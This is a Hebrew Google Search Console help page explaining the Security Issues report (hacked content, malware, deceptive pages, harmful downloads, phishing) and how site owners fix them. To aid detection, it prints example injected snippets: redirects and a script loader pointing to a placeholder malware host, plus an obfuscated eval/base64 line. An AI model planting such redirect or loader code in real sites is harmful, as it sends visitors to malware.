אם במסגרת הערכה של Google נקבע שהאתר שלכם נפרץ, או שהאתר מתנהג באופן שיכול לגרום נזק למבקרים באתר או למחשבים שלהם, הממצאים של Google יוצגו בדוח 'בעיות אבטחה'. דוגמאות להתנהגות מזיקה כוללות התקפות פישינג והתקנת תוכנה זדונית או תוכנה לא רצויה במחשב של המשתמש.
דפים או אתרים שהושפעו מבעיית אבטחה עשויים להופיע עם תווית אזהרה בתוצאות חיפוש, או שיוצג בדפדפן דף ביניים הכולל אזהרה כשמשתמש ינסה להיכנס אליהם.
פותחים את הדוח על בעיות האבטחה
Security issues report in Search Console - Google Search Console Training
מהן בעיות אבטחה?
בעיות האבטחה שמדווחות כאן מחולקות לארבע קטגוריות:
- תוכן פרוץ: תוכן שנשתל באתר ללא רשותכם תוך ניצול של נקודות חולשה באבטחת האתר. על מנת להגן על המשתמשים שלנו, Google עושה את כל המאמצים כדי לא להציג בתוצאות החיפוש תוכן פרוץ. מידע נוסף
- תוכנות זדוניות ותוכנות לא רצויות: תוכנות שנועדו להזיק למכשיר או למשתמשים בו, שפועלות באופן מטעה או בלתי צפוי, או שמשפיעות באופן שלילי על המשתמש. תוכנה זדונית יכולה להיות מותקנת על ידי האקר או על ידי בעלי האתר. מידע נוסף.
- הנדסה חברתית: תוכן שגורם למשתמשים לבצע פעולה מסוכנת, כמו חשיפת מידע סודי או הורדת תוכנה. מידע נוסף.
האם יש בעיות אבטחה באתר?
אם קיימות בעיות אבטחה באתר שלכם, מספר בעיות האבטחה יופיע בחלק העליון של הדוח.
אם לא קיימות בעיות אבטחה באתר שלכם, יופיע סימן וי ירוק והודעה מתאימה.
אבל הרגע קניתי את האתר!
אם קניתם לאחרונה אתר שכבר היו בו בעיות אבטחה, עליכם לתקן את הבעיות שמופיעות בדוח 'בעיות אבטחה', ולאחר מכן להודיע לנו בבקשה לבדיקה מחדש שרכשתם את האתר לאחרונה ושעכשיו הוא עומד בדרישות של המדיניות בנושא ספאם בחיפוש האינטרנט של Google.
אי אפשר לשחזר את הבעיה
תכונת הגלישה הבטוחה של Google מציגה אזהרות למשתמשים לפי הקשר של הגלישה. לכן, לפעמים תוכלו לשחזר אזהרות ולפעמים לא. עם זאת, כדאי להסתמך על דוח בעיות האבטחה כמקור מידע מהימן כדי לבדוק אם קיימות בעיות אבטחה באתר או אם הן תוקנו.
אילו דפים מושפעים?
ניתן להרחיב תיאור בעיה ולהציג רשימת דוגמאות של כתובות דפים שהושפעו. זו לא בהכרח רשימה מלאה, אלא מספר דפים באתר שלכם שהושפעו מהבעיה שנבחרה. מדי פעם, ייתכן שתופיע בעיית אבטחה ללא דוגמאות של כתובות דפים. המשמעות אינה שדפים לא הושפעו, אלא שלא יכולנו לייצר דוגמאות מסיבה כלשהי.
בפרטי הבעיה מוצגים התאריך שבו זוהתה הבעיה באתר שלכם ותיאור קצר עם קישור למידע נוסף על הבעיה.
פתרון הבעיה
כדי לפתור את הבעיה באתר שלכם:
- מרחיבים את תיאור הבעיה בדוח 'בעיות אבטחה'.
- קוראים את תיאור הבעיה, את המידע המפורט ואת שלבי הפתרון בקישור "מידע נוסף". (קישורי מידע נוסף מפנים לתיאורים שבהמשך דף זה).
- נעזרים בדוגמאות של דפים שהושפעו, שסופקו בסעיף הפרטים, כדי לפתור את הבעיה. זו לא בהכרח רשימה מלאה, אלא דוגמה לדפים באתר שלכם שהושפעו מבעיה הזו. ייתכן שתופיע בעיית אבטחה ללא כתובות דפים לדוגמה. המשמעות אינה שדפים לא הושפעו, המשמעות היא שלא יכולנו לייצר דוגמאות מסיבה כלשהי.
- מתקנים את הבעיה בכל האתר. פתרון הבעיה רק בחלק מהדפים לא יאפשר החזרה חלקית לתוצאות החיפוש.
- אם בדוח מופיעות מספר בעיות שמשפיעות על האתר, יש לתקן את כולן.
- בודקים את התיקונים.
- אחרי שכל הבעיות שהופיעו בדוח תוקנו בכל הדפים, בוחרים באפשרות בקשת בדיקה בדוח 'בעיות אבטחה'. בבקשה לבדיקה מחדש, מתארים את הפתרונות שיושמו. בקשה תקינה כוללת:
- הסבר מדויק על בעיית האיכות באתר.
- תיאור של הפעולות שעשיתם כדי לפתור את הבעיה.
- תיעוד התוצאות של הפעולות האלה.
- הטיפול בבקשות לבדיקה מחדש עשוי להימשך זמן מה (ראו בהמשך). הודעות על ההתקדמות יישלחו אליכם באימייל. אחרי שתשלחו את הבקשה תקבלו אישור קבלה כדי שתדעו שהבדיקה התחילה. אין לשלוח מחדש את הבקשה לפני שתקבלו הודעה על ההחלטה הסופית לגבי הבקשה הקיימת.
כמה זמן אורך הטיפול בבקשת הבדיקה מחדש?
ברוב המקרים, הטיפול בבקשות לבדיקה מחדש עשוי להימשך מספר ימים או שבועות. במקרים מסוימים, כמו בקשות לבדיקה מחדש הנוגעות לקישורים, ייתכן שבדיקת הבקשה תימשך זמן רב יותר מהרגיל. כשנקבל את הבקשה שלכם, נודיע לכם על כך באימייל כדי שתדעו שהבדיקה התחילה. בסיום הבדיקה נשלח הודעת אימייל נוספת.
אין לשלוח מחדש את הבקשה לפני שתקבלו הודעה על ההחלטה לגבי הבקשה הקיימת. שליחת בקשה לבדיקה מחדש כאשר הבעיה לא תוקנה יכולה להאריך את זמן הטיפול בבקשה הנוספת, או אפילו לגרום לכך שהחשבון יסומן כעבריין סדרתי.
רשימה של בעיות אבטחה
הנה רשימה של בעיות אבטחה אפשריות, עם מידע לגבי תיקון של כל אחת מהן. הבעיות מסווגות כשגיאות 
או כאזהרות 
.
הסברים על בעיות אבטחה – הדרכה ב-Google Search Console
נוסף בפריצה: תוכנה זדונית
1. מאשרים שיש בעיה
נכנסים למספר כתובות URL לדוגמה בדפדפן Chrome. סביר להניח שתוצג האזהרה מסוכן בסרגל הניווט של הדפדפן, ויופיע דף מעברון עם אזהרה שייראה בערך כך:
2. מחליטים אם זו בעיה שאתם יכולים לתקן
כדי לתקן בעיה שקשורה לתוכנה זדונית באתר, נדרשת היכולת לקרוא ולהבין קוד, ולפעמים גם היכולת להבין בנושא ההגדרות בשרתי האינטרנט של האתר. אם אינכם מתמחים בנושאים אלו, ניתן לקרוא על הקמת צוות תמיכה כדי לדעת איך למצוא מישהו שיעזור לפתור את הבעיה הזו.
3. מאבחנים את הבעיה שקשורה לתוכנה הזדונית ופותרים אותה
קוראים את הקטע בנושא תיקון תוכנה זדונית במדריך בנושא פריצות באתר web.dev כדי להבין איך לזהות את סוג התוכנה הזדונית ולתקן את הבעיה. הערה: ייתכן שיותר מסוג אחד של תוכנה זדונית פגע באתר. חשוב להיות יסודיים בתהליך אבחון וניקוי האתר. מאמתים את נוכחות הבעיה באחת מכתובות ה-URL לדוגמה, שמוצגת בדוח 'בעיות אבטחה'.
4. מבקשים בדיקה
אחרי שאישרתם שהבעיה תוקנה באתר, תוכלו לבקש בדיקת אבטחה בדוח 'בעיות אבטחה'. השלמת בדיקה יכולה לארוך מספר ימים עד מספר שבועות.
5. משתמשים בשיטות המומלצות לשמירה על אבטחת האתר
מומלץ לקרוא את ההנחיות האלה שבהן מוסבר איך מונעים פריצה לאתר ואיך מנהלים מעקב אחר אבטחת האתר.
נוסף בפריצה: החדרת קוד
האקר פגע באתר שלכם והחדיר קוד זדוני לדפים. דוגמאות לנזקים כוללות הפניה לאתר זדוני או הרצה של תוכנת כורה מטבעות וירטואליים בדפדפן שלכם בעת שהדף פתוח.
1. מחליטים אם זו בעיה שאתם יכולים לתקן
ניתן לעיין בקטע בנושא הקמת צוות תמיכה כדי לברר מה דרוש לתיקון הבעיה בעצמכם, או כדי לברר איך לקבל עזרה אם אתם חושבים שלא תוכלו לפתור את הבעיה בעצמכם.
2. מאשרים שיש בעיה
מאמתים את נוכחות הבעיה באחת מכתובות ה-URL שניתנו כדוגמה לאזהרה הזאת.
אל תפתחו דפים נגועים באתר באמצעות הדפדפן.
הרבה פעמים תוכנות זדוניות מתפשטות על ידי ניצול נקודות התורפה של הדפדפן. לכן, פתיחת דף שנגוע בתוכנה זדונית בדפדפן עלולה לגרום נזק למחשב. בנוסף, האקרים עלולים להסתיר את תוכן הספאם באמצעות שיטות הסוואה, כדי שבעלי האתרים לא יזהו אותם.
יש שתי דרכים בטוחות יותר להציג את התוכן במחשב:
- להשתמש בכלי לבדיקת כתובות URL כדי לצפות בדף שלכם כפי ש-Google רואה אותו. האקרים רבים מבצעים שינויים שרק המכונות של Google רואות, וכך תוכלו לראות אותם. כך למשל, הם עשויים להוסיף קישורים מהאתר שלכם לאתר שלהם שמעובדים רק כשהגורם המפנה הוא Google.
- להשתמש ב-cURL או ב-Wget כדי לשלוח בקשות HTTP (למשל אחזור דף) משורת הפקודה. הכלים האלה זמינים בחינם ומאפשרים לאבחן הפניות לאתרים אחרים. אפשר להשתמש בהם כדי לקבל פרטים על הגורם המפנה או סוכן המשתמש. הרבה פעמים, האקרים תוקפים רק סוכני משתמש או גורמים מפנים ספציפיים ובוחרים יעדים טובים יותר כדי שלא יזהו אותם. שימוש בכלים האלה מאפשר לחקות יעד. אם הבקשה לא גורמת להתנהגות ספאמית, אפשר לנסות להשתמש בכתובות של גורמים מפנים שונים (כמו קישורים מאתרים גדולים יותר או ממנועי חיפוש שונים). למשל, כדי לחקות משתמש שעובר מקישור בתוצאות החיפוש של Google לאתר
www.example.com/page.htmlבמכשיר עם Windows, אפשר להשתמש בפקודת cURL הבאה:
$curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html
ייתכן שההאקר החדיר את הקוד הזדוני ישירות לקובצי ה-HTML של האתר (לדוגמה, הוספת כתובת אתר להפניה אוטומטית של JavaScript) או לקבצים שיוצרים את תוכן האתר שלכם (לדוגמה, קובצי PHP).
יש לאחזר את הדף הנגוע שמופיע בדוח ולבדוק את התשובה. האקרים יכולים להשתמש במספר שיטות שונות להפניה של המבקרים מהאתר שלכם אל האתר שלהם. הנה כמה דוגמאות:
- הפניה לכתובת אחרת:
- כותרת מפנה לכתובת אחרת: האקרים יכולים לשנות את קובצי התצורה של השרת כדי להפנות מבקרים לכתובת אחרת. קובצי תצורת השרת מאפשרים בדרך כלל למנהל האתר לציין כתובות אתר להפניה אוטומטית עבור דפים ספציפיים או ספריות ספציפיות באתר. לדוגמה, בשרתי Apache, זהו הקובץ .htaccess וכן הקובץ httpd.conf.
... < HTTP/1.1 301 Moved Permanently < Date: Sun, 24 Feb 2013 21:06:45 GMT < Server: Apache < Location: http://<malware-site>/index.html < Content-Length: 253 - JavaScript מפנה לכתובת אחרת:
<script> if (document.referrer.match(/google\.com/)) { window.location("http://<malware-site>/");} <script>
- כותרת מפנה לכתובת אחרת: האקרים יכולים לשנות את קובצי התצורה של השרת כדי להפנות מבקרים לכתובת אחרת. קובצי תצורת השרת מאפשרים בדרך כלל למנהל האתר לציין כתובות אתר להפניה אוטומטית עבור דפים ספציפיים או ספריות ספציפיות באתר. לדוגמה, בשרתי Apache, זהו הקובץ .htaccess וכן הקובץ httpd.conf.
- קוד JavaScript זדוני שנטען מאתר אחר:
<script type='text/javascript' src='http://<malware-site>/js/x55.js'></script> - קוד זדוני שמעורפל כדי למנוע זיהוי:
eval(base64_decode("d2luZG93LmxvY2F0aW9uPScvL2dvb2dsZS5jb20nOw=="));
יש לחפש קוד חשוד בתגובות ובאתר. מילות חיפוש יעילות כוללות: "search", "eval", "base64_decode"ו-"unescape".
3. מנקים את האתר
כשתהיו מוכנים לנקות את האתר, תוכלו להחליף את הקבצים שנפגעו בקבצים מהגיבוי התקין האחרון או להסיר את התוכן הספאמי בעצמכם.
בנוסף:
- מומלץ לקרוא את המדריך בנושא פריצות. במדריך מתואר תהליך מלא לתיקון האתר, כולל שלבים לניקוי האתר וטיפים למניעת פריצות נוספות לאתר.
4. מבקשים בדיקה
אחרי שאישרתם שהבעיה תוקנה באתר, תוכלו לבקש בדיקת אבטחה בדוח 'בעיות אבטחה'. השלמת בדיקה יכולה לארוך מספר ימים עד מספר שבועות.
נוסף בפריצה: החדרת תוכן
האקר הוסיף קישורי ספאם או טקסט ספאם לדפי האתר שלכם. התוכן שהוחדר עשוי להכיל מונחים הקשורים לתרופות או ספאם אחר שאינו קשור לתוכן האתר.
בדרך כלל, האקרים משנים את האתר באחת מהדרכים האלה:
- על-ידי קבלת גישה לספרייה לא מאובטחת בשרת שלך. לדוגמה, ייתכן שהשארת בטעות ספרייה עם הרשאות פתוחות.
- על-ידי ניצול פגיעות בתוכנה שפועלת באתר שלכם, כמו מערכת לניהול תוכן. לדוגמה, ייתכן שאתם מריצים גרסה ישנה יותר ובטוחה פחות של Drupal, Joomla! או WordPress.
- על-ידי פריצה ליישומי פלאגין של צדדים שלישיים שבהם אתם משתמשים באתר, כגון מוני ביקורים.
1. מחליטים אם זו בעיה שאתם יכולים לתקן
ניתן לעיין בקטע בנושא הקמת צוות תמיכה כדי לברר מה דרוש לתיקון הבעיה בעצמכם, או כדי לברר איך לקבל עזרה אם אתם חושבים שלא תוכלו לפתור את הבעיה בעצמכם.
2. מאשרים שיש בעיה
מאמתים את נוכחות הבעיה באחת מכתובות ה-URL שניתנו כדוגמה לאזהרה הזאת.
אל תפתחו דפים נגועים באתר באמצעות הדפדפן.
הרבה פעמים תוכנות זדוניות מתפשטות על ידי ניצול נקודות התורפה של הדפדפן. לכן, פתיחת דף שנגוע בתוכנה זדונית בדפדפן עלולה לגרום נזק למחשב. בנוסף, האקרים עלולים להסתיר את תוכן הספאם באמצעות שיטות הסוואה, כדי שבעלי האתרים לא יזהו אותם.
יש שתי דרכים בטוחות יותר להציג את התוכן במחשב:
- להשתמש בכלי לבדיקת כתובות URL כדי לצפות בדף שלכם כפי ש-Google רואה אותו. האקרים רבים מבצעים שינויים שרק המכונות של Google רואות, וכך תוכלו לראות אותם. כך למשל, הם עשויים להוסיף קישורים מהאתר שלכם לאתר שלהם שמעובדים רק כשהגורם המפנה הוא Google.
- להשתמש ב-cURL או ב-Wget כדי לשלוח בקשות HTTP (למשל אחזור דף) משורת הפקודה. הכלים האלה זמינים בחינם ומאפשרים לאבחן הפניות לאתרים אחרים. אפשר להשתמש בהם כדי לקבל פרטים על הגורם המפנה או סוכן המשתמש. הרבה פעמים, האקרים תוקפים רק סוכני משתמש או גורמים מפנים ספציפיים ובוחרים יעדים טובים יותר כדי שלא יזהו אותם. שימוש בכלים האלה מאפשר לחקות יעד. אם הבקשה לא גורמת להתנהגות ספאמית, אפשר לנסות להשתמש בכתובות של גורמים מפנים שונים (כמו קישורים מאתרים גדולים יותר או ממנועי חיפוש שונים). למשל, כדי לחקות משתמש שעובר מקישור בתוצאות החיפוש של Google לאתר
www.example.com/page.htmlבמכשיר עם Windows, אפשר להשתמש בפקודת cURL הבאה:
$curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html
מאחזרים מספר דפים באתר ומחפשים בתגובות תוכן חשוד או קישורים שלא אתם הוספתם. לדוגמה, ניתן לחפש מוצרים תרופתיים או מונחי ספאם כמו "viagra" או "earn money".
3. מנקים את האתר
כשתהיו מוכנים לנקות את האתר, תוכלו להחליף את הקבצים שנפגעו בקבצים מהגיבוי התקין האחרון או להסיר את התוכן הספאמי ואת הקישורים מכל דף. יש לוודא שאתם מתקנים את כל הדוגמאות לפריצות שמופיעות בדוח 'בעיות אבטחה'. בנוסף, ניתן למצוא דפים נוספים באתר שאולי נפרצו, על-ידי חיפוש בעזרת ":site" ב-Google וחיפוש של קובצי מקור באתר.
בנוסף:
- מומלץ לקרוא את המדריך בנושא פריצות. במדריך מתואר תהליך מלא לתיקון האתר, כולל שלבים לניקוי האתר וטיפים למניעת פריצות נוספות לאתר.
4. מבקשים בדיקה
אחרי שאישרתם שהבעיה תוקנה באתר, תוכלו לבקש בדיקת אבטחה בדוח 'בעיות אבטחה'. השלמת בדיקה יכולה לארוך מספר ימים עד מספר שבועות.
נוסף בפריצה: החדרת כתובת URL
האקר יצר דפים חדשים באתר שלכם, שכוללים לרוב מילות או קישורי ספאם. לעתים דפים חדשים אלה מכילים קוד שמבצע פעולות שלא התכוונתם אליהן, כגון, הפניה אוטומטית של המשתמשים לאתרים אחרים או השתתפות של שרת האינטרנט שלכם בתקיפה מסוג מניעת שירות כנגד אתרים אחרים.
1. מחליטים אם זו בעיה שאתם יכולים לתקן
ניתן לעיין בקטע בנושא הקמת צוות תמיכה כדי לברר מה דרוש לתיקון הבעיה בעצמכם, או כדי לברר איך לקבל עזרה אם אתם חושבים שלא תוכלו לפתור את הבעיה בעצמכם.
2. מאשרים שיש בעיה
מאמתים את נוכחות הבעיה באחת מכתובות ה-URL שניתנו כדוגמה לאזהרה הזאת.
אל תפתחו דפים נגועים באתר באמצעות הדפדפן.
הרבה פעמים תוכנות זדוניות מתפשטות על ידי ניצול נקודות התורפה של הדפדפן. לכן, פתיחת דף שנגוע בתוכנה זדונית בדפדפן עלולה לגרום נזק למחשב. בנוסף, האקרים עלולים להסתיר את תוכן הספאם באמצעות שיטות הסוואה, כדי שבעלי האתרים לא יזהו אותם.
יש שתי דרכים בטוחות יותר להציג את התוכן במחשב:
- להשתמש בכלי לבדיקת כתובות URL כדי לצפות בדף שלכם כפי ש-Google רואה אותו. האקרים רבים מבצעים שינויים שרק המכונות של Google רואות, וכך תוכלו לראות אותם. כך למשל, הם עשויים להוסיף קישורים מהאתר שלכם לאתר שלהם שמעובדים רק כשהגורם המפנה הוא Google.
- להשתמש ב-cURL או ב-Wget כדי לשלוח בקשות HTTP (למשל אחזור דף) משורת הפקודה. הכלים האלה זמינים בחינם ומאפשרים לאבחן הפניות לאתרים אחרים. אפשר להשתמש בהם כדי לקבל פרטים על הגורם המפנה או סוכן המשתמש. הרבה פעמים, האקרים תוקפים רק סוכני משתמש או גורמים מפנים ספציפיים ובוחרים יעדים טובים יותר כדי שלא יזהו אותם. שימוש בכלים האלה מאפשר לחקות יעד. אם הבקשה לא גורמת להתנהגות ספאמית, אפשר לנסות להשתמש בכתובות של גורמים מפנים שונים (כמו קישורים מאתרים גדולים יותר או ממנועי חיפוש שונים). למשל, כדי לחקות משתמש שעובר מקישור בתוצאות החיפוש של Google לאתר
www.example.com/page.htmlבמכשיר עם Windows, אפשר להשתמש בפקודת cURL הבאה:
$curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html
מריצים שאילתות על הדוגמאות של כתובות ה-URL שרשומות בדוח, כדי לראות אם הכתובות האלה פעילות. קרוב לוודאי שלא יצרתם את הדפים האלה בעצמכם, לכן תצטרכו להסיר את הדפים מהאתר, או למחוק את הקוד שמייצר באופן אוטומטי את הדפים. קראו כיצד למצוא ולנקות את הדפים האלה מהאתר שלכם.
באפשרותכם להשתמש ב-":site" במהלך החיפוש כדי למצוא דפים שלא אתם יצרתם.
- באתר קטן, ניתן לחפש [site:example.com] בחיפוש Google כדי לקבל רשימה של דפים שהוספנו לאינדקס ולבדוק אם קיימים בה דפים שלא אתם יצרתם.
- באתרים גדולים, אתם יכולים להשתמש בשאילתה ספציפית יותר, כמו:
- [site:example.com pharmacy] - רשימה של כל הדפים שכוללים את המילה "pharmacy" באתר example.com. החליפו את המילה במונחים ספאמיים נפוצים אחרים.
- [site:example.com/wp-admin/] - רשימה של כל הדפים באתר שבקטע מנהל המערכת, באתר WordPress שלכם.
3. מנקים את האתר
כשתהיו מוכנים לנקות את האתר, תוכלו להחליף את הספריות שנפגעו בספריות מהגיבוי התקין האחרון, או להסיר את הדפים הלא רצויים ואת כל הפונקציות או הקבצים שבהם ההאקר השתמש כדי ליצור את הספריות.
בנוסף:
- מומלץ לקרוא את המדריך בנושא פריצות. במדריך מתואר תהליך מלא לתיקון האתר, כולל שלבים לניקוי האתר וטיפים למניעת פריצות נוספות לאתר.
4. מבקשים בדיקה
אחרי שאישרתם שהבעיה תוקנה באתר, תוכלו לבקש בדיקת אבטחה בדוח 'בעיות אבטחה'. השלמת בדיקה יכולה לארוך מספר ימים עד מספר שבועות.
דפים מטעים
האתר שלכם כולל תוכן שגורם למבקרים לבצע פעולה מסוכנת, כמו חשיפת מידע סודי או הורדת תוכנה. גלישה בטוחה של Google מגינה על משתמשים באינטרנט, באמצעות הצגת אזהרה לפני כניסה לדפים שמציגים תוכן מטעה באופן קבוע.
דפי אינטרנט נחשבים למטעים כאשר הם:
- נראים או פועלים כאילו מדובר בישות מהימנה, כמו המכשיר או הדפדפן שלכם, או כמו האתר עצמו, או
- מנסים לגרום לביצוע פעולה שמבצעים רק במקרה שהישות מהימנה, כמו שיתוף סיסמה, התקשרות לתמיכה הטכנית או הורדת תוכנה.
סוג זה של תוכן מטעה מכונה הנדסה חברתית. לרשותכם מידע נוסף על הנדסה חברתית או דוגמאות של דפים מטעים.
פתרון הבעיה
1. מאשרים שיש בעיה
נכנסים לדפי הדוגמאות כדי לחפש את התוכן המטעה. ניתן להשתמש בכלי לבדיקת כתובות URL לצפייה באתר בתצוגה לנייד ובתצוגה למחשב.
2. פותרים את הבעיות בדפים
יש לפתור את הבעיות בכל הדפים שמיישמים הנדסה חברתית. אם אתם סבורים ששירות הגלישה הבטוחה סיווג דף אינטרנט בטעות, כאן צריך לדווח על כך.
3. מבקשים בדיקה
אחרי שאישרתם שהבעיה תוקנה באתר, תוכלו לבקש בדיקת אבטחה בדוח 'בעיות אבטחה'. השלמת בדיקה יכולה לארוך מספר ימים עד מספר שבועות.
משאבים מוטמעים מטעים
האתר שלכם כולל מודעות מטעות או משאבים מוטמעים שגורמים למבקרים לבצע פעולה מסוכנת, כמו חשיפת מידע סודי או הורדת תוכנה לא רצויה. תוכן מטעה יכול להיכלל במשאבים שמוטמעים בדף, כמו תמונות, רכיבים אחרים של צדדים שלישיים או מודעות. גלישה בטוחה של Google מגינה על משתמשים באינטרנט, באמצעות הצגת אזהרה לפני כניסה לדפים שמציגים תוכן מטעה באופן קבוע.
לפעמים התוכן הזה גלוי למשתמשים בדף המארח. במקרים אחרים האתר המארח לא מכיל מודעות גלויות, אבל מפנה משתמשים לדפים מסוכנים דרך חלונות שקופצים מלפנים או מאחור, או דרך הפניות אוטומטיות מסוגים אחרים. בכל המקרים, סוג זה של תוכן מוטמע יוביל להפרת מדיניות על-ידי הדף המארח.
סוג זה של תוכן מטעה מכונה הנדסה חברתית. לרשותכם מידע נוסף על הנדסה חברתית או דוגמאות של משאבים מוטמעים מטעים.
פתרון הבעיה
1. מאשרים שיש בעיה
נכנסים לדפי הדוגמאות כדי לחפש את התוכן המטעה. מוודאים שהמודעות, התמונות או משאבים מוטמעים נוספים של צדדים שלישיים בדפי האתר אינם מטעים. הערה: ייתכן שהמודעות בדפי האתר יוצגו בסבב על ידי רשתות מודעות. לכן, ייתכן שיהיה עליך לרענן דף כלשהו מספר פעמים כדי לראות מודעות של הנדסה חברתית. מודעות מסוימות עשויות להופיע באופן שונה במכשירים ניידים ובמחשבים נייחים. ניתן להשתמש בכלי לבדיקת כתובות URL לצפייה באתר בתצוגה לנייד ובתצוגה למחשב.
2. מסירים את המודעות או את המשאבים המטעים
בודקים את המשאבים של צדדים שלישיים הכלולים באתר. מוודאים שהמודעות, התמונות או משאבים מוטמעים נוספים של צדדים שלישיים בדפי האתר אינם מטעים. יש לפתור את הבעיות בכל הדפים שמיישמים הנדסה חברתית.
3. מבקשים בדיקה
אחרי שאישרתם שהבעיה תוקנה באתר, תוכלו לבקש בדיקת אבטחה בדוח 'בעיות אבטחה'. השלמת בדיקה יכולה לארוך מספר ימים עד מספר שבועות.
הורדות מזיקות
האתר שלכם מציע למשתמשים הורדה, ולפי הגלישה הבטוחה של Google מדובר בתוכנה זדונית או בתוכנה לא רצויה. ייתכן שדפדפן Chrome יציג אזהרה כשמשתמש יבקר באתר. עליכם להסיר את ההורדות האלה מהאתר כדי שהאזהרה תוסר.
1. מאשרים שיש בעיה
צופים בכמה מדפי הדוגמאות באתר שלכם כדי לאמת את קיומן של הורדות אלו.
2. מבצעים הערכה של הבעיה
- אם ההורדות נוספו ביוזמתכם, הסירו אותן מהאתר ודלגו לבקשת בדיקה.
- אם אינכם מודעים לקיומן של ההורדות באתר שלכם, ייתכן שהוא נפרץ. יש לתקן את האתר הפרוץ, ולאחר מכן לאתר את ההורדות ולהסיר אותן.
3. מנקים את האתר
מומלץ לקרוא את המדריך בנושא פריצות. במדריך מתואר תהליך מלא לתיקון האתר, כולל שלבים לניקוי האתר וטיפים למניעת פריצות נוספות לאתר. כשתהיו מוכנים לנקות את האתר, תוכלו להחליף את הקבצים שנפגעו בקבצים מהגיבוי התקין האחרון או להסיר את התוכן הספאמי בעצמכם. יש להשתמש בתוכנת אנטי-וירוס לביצוע סריקה, לאיתור קבצים בינאריים ותכנים אחרים שמתארחים באתר. תוכנות אנטי-וירוס מאתרות סוגים רבים של תוכנות זדוניות ובלתי רצויות, אבל למרבה הצער, לא את כולם. שליחת התוכנה לבדיקה באמצעות תוכנית אנטי-וירוס (או באמצעות שירות כמו VirusTotal) שמאחד בתוכו מספר תוכנות אנטי-וירוס) תעניק אינדיקציה לגבי בעיות פוטנציאליות בתוכנה. שירות הגלישה הבטוחה של Google מחיל קריטריונים משלו כדי לקבוע אם תוכנית או קובץ בינארי מסוימים הם תוכנה לא רצויה או תוכנה זדונית.
4. מאשרים את התיקונים
עליכם לוודא שהאתר שלכם עומד בתנאי מדיניות התוכנות הלא רצויות.
5. מבקשים בדיקה
אחרי שאישרתם שהבעיה תוקנה באתר, תוכלו לבקש בדיקת אבטחה בדוח 'בעיות אבטחה'. השלמת בדיקה יכולה לארוך מספר ימים עד מספר שבועות.
קישורים להורדות מזיקות
האתר שלכם מכיל קישורים לאתרים המציעים הורדות שהן תוכנות זדוניות או תוכנות לא רצויות, לפי הגלישה הבטוחה של Google. ייתכן שדפדפן Chrome יציג אזהרה כשמשתמש יבקר באתר. עליכם להסיר את הקישורים לאתרים מזיקים כדי שהאזהרה תוסר.
1. מאשרים שיש בעיה
צופים בכמה מדפי הדוגמאות באתר שלכם כדי לאמת את קיומן של הורדות אלו. במקרים מסוימים, האקרים יכולים להסתיר את הקישורים האלו אם הם חושבים שאתם בעלי האתר. לכן, מומלץ להיכנס לכתובות ה-URL לדוגמה באמצעות הכלי לבדיקת כתובות URL. לחלופין, אפשר להיכנס אליהן לאחר התחברות לחשבון אחר, או לאחר התחברות ממחשב אחר.
2. מבצעים הערכה של הבעיה
אם קישורים אלה נוספו ביוזמתכם, עליכם להסיר אותם מהאתר ולדלג לבקשת בדיקה.
אם אינכם מודעים לקיומם של הקישורים באתר שלכם, ייתכן שהוא נפרץ.
3. מחליטים אם זו בעיה שאתם יכולים לתקן
אם האתר שלכם נפרץ, ניתן לעיין בקטע בנושא הקמת צוות תמיכה כדי לברר מה דרוש לתיקון הבעיה בעצמכם, או כדי לברר איך לקבל עזרה אם אתם חושבים שלא תוכלו לפתור את הבעיה בעצמכם.
4. מנקים את האתר
מומלץ לקרוא את המדריך בנושא פריצות. במדריך מתואר תהליך מלא לתיקון האתר, כולל שלבים לניקוי האתר וטיפים למניעת פריצות נוספות לאתר. כשתהיו מוכנים לנקות את האתר, תוכלו להחליף את הקבצים שנפגעו בקבצים מהגיבוי התקין האחרון או להסיר את התוכן הספאמי בעצמכם.
5. מאשרים את התיקונים
עליכם לוודא שהאתר שלכם עומד בתנאי מדיניות התוכנות הלא רצויות.
6. מבקשים בדיקה
אחרי שאישרתם שהבעיה תוקנה באתר, תוכלו לבקש בדיקת אבטחה בדוח 'בעיות אבטחה'. השלמת בדיקה יכולה לארוך מספר ימים עד מספר שבועות.
חיוב לא ברור לנייד
מערכת Google זיהתה שהאתר שלכם לא מיידע את המשתמשים במידה מספקת על חיובים בניידים. Chrome עשוי להציג אזהרה לפני שהמשתמש יטען דף שמוביל לחיובים.
1. מאשרים שיש בעיה
נכנסים אל כתובות ה-URL לדוגמה שמופיעות בדוח, כדי לראות אילו דפים כוללים התנהגות חריגה ולא ברורה של חיוב לנייד. כאן ניתן לעיין בהנחיות לחיובים בניידים.
2. פותרים את הבעיה
מתקנים את הדפים כך שהם יפעלו לפי השיטות המומלצות לחיובים בניידים.
3. מבקשים בדיקה
אחרי שאישרתם שהבעיה תוקנה באתר, תוכלו לבקש בדיקת אבטחה בדוח 'בעיות אבטחה'. השלמת בדיקה יכולה לארוך מספר ימים עד מספר שבועות.
חשד לפישינג שזוהה בהתחברות המשתמשים לאתר
יש חשד שחלק מהדפים באתר שלכם מכילים פישינג, והופעלה הודעת אזהרה קופצת על שימוש חוזר בסיסמה בזמן ניסיון התחברות של משתמשים לאתר. גלישה בטוחה של Google מגינה על משתמשים באינטרנט באמצעות הצגת אזהרה, כשנעשה שימוש חוזר בסיסמה השמורה שלהם במקרים כאלה
האקרים יכולים לפעמים להטעות את המשתמשים ולגרום להם להשתמש מחדש בסיסמאות שלהם בדפים שנראים כמו דפי כניסה של אתרים רשמיים, במטרה לגנוב את פרטי המשתמשים. סוג זה של תוכן מטעה מכונה הנדסה חברתית. לרשותכם מידע נוסף על הנדסה חברתית ודוגמאות של דפים מטעים.
1. מאשרים שיש בעיה
נכנסים לדפי הדוגמאות כדי לחפש את תוכן הפישינג. ניתן להשתמש בכלי לבדיקת כתובות URL לצפייה באתר בתצוגה לנייד ולמחשב.
2. פותרים את הבעיה
